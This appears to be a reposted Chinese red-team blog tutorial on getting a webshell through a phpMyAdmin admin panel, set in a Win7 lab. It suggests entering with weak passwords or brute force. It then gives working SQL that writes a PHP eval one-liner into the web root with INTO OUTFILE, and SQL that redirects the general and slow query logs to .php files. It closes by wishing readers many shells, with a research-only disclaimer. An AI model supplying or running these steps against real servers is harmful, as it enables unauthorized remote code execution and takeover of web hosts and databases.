『红蓝对抗』phpMyAdmin 后台 getshell

admin

137432
文章

113
评论

2023年2月25日06:17:14评论168 views字数 1927阅读6分25秒阅读模式

点击蓝字

关注我们

日期：2023-02-23

作者：yukong

介绍：分享一下攻防对抗中常用到的phpMyAdmin后台getshell方法。

0x00 前言

后台权限的得分还是比较少的，我们的路当然不止于此啦。

实验环境：

win7 虚拟机Apache 2.4.39MySQL 5.7.26PHP  5.5.9phpMyAdmin  4.8.5

0x01 phpMyAdmin简介

phpMyAdmin 是一个以PHP为基础，以Web-Base方式架构在网站主机上的MySQL的数据库管理工具，让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径，尤其要处理大量资料的汇入及汇出更为方便。

phpMyAdmin跟其他PHP程序一样在网页服务器上执行，可以在远端管理MySQL数据库，方便的建立、修改、删除数据库及资料表。

在通过对目标进行信息收集、目录扫描后，发现存在phpmyadmin后台，可通过弱口令（可以直接尝试下账号root密码root）或者暴力破解进入管理后台。下面会介绍一些真实环境中常用到后台getshell的方法。

0x02 getshell方法

2.1 直接写入shell文件

通过outfile和dumpfile直接写入shell 文件

（1）利用条件：

对web目录需要有写权限
知道绝对路径
secure_file_priv没有具体值

（2）outfile和dumpfile的区别

　　outfile：

支持多行数据同时导出
使用union联合查询时，要保证两侧查询的列数相同
会在换行符制表符后面追加反斜杠
会在末尾追加换行

dumpfile：

每次只能导出一行数据
不会在换行符制表符后面追加反斜杠
不会在末尾追加换行

因此我们平时直接写入命令的时候使用outfile即可，特定环境需要写入二进制文件时使用dumpfile。

（3）具体操作

查看可写目录：

show variables like '%secure%';

如果secure_file_priv如果是一个目录，则只能在对应的目录下读文件，如果是空（如上图）即不对写入做限制，如果是null，表示MySQL不允许写入写入。

直接将一句话写入网站目录：

select '<?php @eval($_POST[cmd]);?>' into outfile 'c:/phpstudy_pro/www/shell.php';

可以直接写入成功，在没有存在限制的情况下还是比较简单的，同理将outfile改成dumpfile 以二进制的方式写入也是可以的。

2.2 全局日志getshell

在mysql中，查询语句会被写入到日志文件中去，可以通过phpMyAdmin后台执行sql语句开启日志功能，修改日志存储文件。

利用条件：

root权限
知道网站绝对路径

（1）查询日志开启状态以及日志写入文件位置：

show variables like '%general%';

（2）开启日志检测，自定义日志路径

# 开启日志监测，set global general_log = on;  # 设置自定义日志路径  set global general_log_file = 'c:/phpstudy_pro/www/shell1.php';  
PS：真实环境下getshell之后及时改回原状态

（3）携带一句话访问网站，记录日志getshell

随便找个位置写入一句话：

查看日志：

看到已经记录了php语句，通过网页访问可以解析成功：

2.3 慢查询日志getshell

在mysql中，查询超过10秒的语句会被写到慢查询日志文件中去，一般默认是不开启的。利用这个特性就可以进行文件写入。

优势：数据库业务大的网站，几秒钟全局查询日志巨大，访问shell文件就会提示500错误，通过慢查询日志可以避免这个问题。

利用条件：

root权限
知道网站绝对路径

（1）查看慢查询日志开启情况

show variables like '%slow_query_log%';

（2）开启慢查询日志，修改日志文件存储的绝对路径

# 开启慢查询日志set global slow_query_log=on;# 修改日志文件存储位置set global slow_query_log_file='c:/phpstudy_pro/www/shell2.php';

（3）向日志文件中写入shell请求

这里需要用到延时函数

select '<?php @eval($_POST[shell]);?>' or sleep(11);

最终写入成功。

0x03 总结

总的来说getshell的方法很多，上面这些是在实战中比较常用的方法。祝大家shell拿到手软。

原文始发于微信公众号（宸极实验室）：『红蓝对抗』phpMyAdmin 后台 getshell

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

『红蓝对抗』phpMyAdmin 后台 getshell

0x00 前言

0x01 phpMyAdmin简介

0x02 getshell方法

2.1 直接写入shell文件

2.2 全局日志getshell

2.3 慢查询日志getshell

0x03 总结

Hackable_III

Vulnerable Docker 1靶机通关教学

xss靶场

PoC 针对 Ingress NGINX 漏洞编号 CVE-2025-1097、1098、24514、1974

实战-菠菜通杀

攻防实战|记一次和安全产品贴身肉搏

【红队思路】钓鱼-资源捆绑Bypass国内AV

Src高危实战记录

对DogsVsCats例子的调优模型训练过程（二）

Sitecore几年前的洞CVE-2019-9874：反序列化实现的未经认证的 RCE（CVSS 9.8）

发表评论

在线咨询

微信